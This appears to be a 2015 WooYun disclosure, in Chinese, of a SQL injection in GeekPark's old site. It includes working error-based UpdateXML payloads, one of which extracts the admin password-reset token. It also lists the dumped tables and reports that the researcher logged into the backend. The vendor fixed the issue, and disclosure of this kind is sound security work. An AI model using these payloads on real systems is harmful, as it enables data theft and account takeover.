当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092588

漏洞标题:极客公园官方网站SQL注射漏洞1(已进后台)

相关厂商:geekpark.net

漏洞作者: 猪猪侠

提交时间:2015-01-18 22:14

修复时间:2015-01-19 10:26

公开时间:2015-01-19 10:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-18: 细节已通知厂商并且等待厂商处理中
2015-01-18: 厂商已经确认,细节仅向厂商公开
2015-01-19: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

极客公园主站SQL注射漏洞1,前面那个白帽子漏洞打偏,给剑心(顿神)(叫兽易小星)丢脸了,先发一个,再找找看。

详细说明:

http://old.geekpark.net/ajax/like_entity
POST: guid=210714

Database: gpk_main
[20 tables]
+------------------------------+
| activities                   |
| activity_sponsor_relations   |
| agendas                      |
| announcements                |
| applies                      |
| authorizations               |
| categories                   |
| collection_content_relations |
| collections                  |
| comments                     |
| images                       |
| manuscripts                  |
| marketings                   |
| media_applies                |
| notifications                |
| rates                        |
| schema_migrations            |
| spams                        |
| speech_user_relations        |
| speeches                     |
+------------------------------+


gpk_main 是极客公园的主站数据库,实时的
查询出管理员重设密码的TOKEN

guid=210714 and UpdateXML(1,CONCAT(0x5b,mid((SELECT password_reset_token from gpk_main.users where id=1),1,32),0x5d),1)


token.jpg


进入后台

houtai.png


到此一游

dcyy.jpg

漏洞证明:

http://old.geekpark.net/ajax/like_entity
guid=210714 and UpdateXML(1,CONCAT(0x5b,mid((SELECT database()),1,32),0x5d),1)


gk1.jpg


gk2.jpg

修复方案:

过滤

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-01-18 22:24

厂商回复:

谢谢猪猪侠!

最新状态:

2015-01-19:因为 old 等是暂停使用的站点。现已将历史版本下线,待修复后上线

漏洞评价:

评论

  1. 2015-01-18 22:18 | Woodee ( 路人 | 还没有发布任何漏洞 | 乌云路人甲,打脸pa pa pa)

    猪哥前列腺那么发达 一定不会射偏的

  2. 2015-01-18 22:20 | 天地不仁 以万物为刍狗 ( 普通白帽子 | Rank:977 漏洞数:264 | 天地本不仁 万物为刍狗)

    前排求审核:http://wooyun.org/bugs/wooyun-2015-092535/trace/4bb99d447c56637d00b8254e93c45353我不会告诉你们是一家的

  3. 2015-01-18 22:24 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    尼玛... SQL注射漏洞1 带系列的啊

  4. 2015-01-18 22:26 | 极客公园(乌云厂商)

    很多是我们以前站点的,的确有很多sql注入问题。辛苦大家了!

  5. 2015-01-18 22:28 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @极客公园 里面怎么说有用户数据库啊,前面一个都是20RANK,哎

  6. 2015-01-18 22:29 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:157 | 收wb 1:5 无限量收 [平台担保]))

    卧槽,已确认!!这么快!

  7. 2015-01-18 22:31 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    @猪猪侠 @极客公园 我还有两个极客的没审核呢·~

  8. 2015-01-18 22:44 | 极客公园(乌云厂商)

    @猪猪侠 这的确是,数据在里面。谢谢大家指出的问题,我们会尽快修复。不过今天有点累,可能不能及时确认,见谅

  9. 2015-01-18 22:49 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @极客公园 好好休息吧,最近累够呛。漏洞慢慢修,不急。

  10. 2015-01-19 08:08 | Woodee ( 路人 | 还没有发布任何漏洞 | 乌云路人甲,打脸pa pa pa)

    @极客公园 你们的GIF活动很棒,辛苦了!休息好了再修漏洞。

  11. 2015-01-19 10:27 | 极客公园(乌云厂商)

    @爱上平顶山 赶快赶快告诉我

  12. 2015-01-19 10:31 | 极客公园(乌云厂商)

    @猪猪侠 我都是用手机浏览器弄的,所以瞎填的。我错了... 下次我肯定认真填。但愿没有下次了

  13. 2015-01-19 10:40 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    @极客公园 已经出来了

  14. 2015-01-20 16:11 | 心东 ( 实习白帽子 | Rank:45 漏洞数:10 | 不怕别人技术牛逼,就怕别人牛逼了还比你勤...)

    @Woodee 1111

  15. 2015-01-20 17:55 | Sofia ( 路人 | Rank:25 漏洞数:6 | 不会渗透的SEOer不是好站长)

    火钳刘明

  16. 2015-01-22 19:08 | 小涛 ( 路人 | 还没有发布任何漏洞 | 跟随大大们的脚本来的)

    好棒 好帮啊~

  17. 2015-02-26 13:31 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    膜拜猪哥来了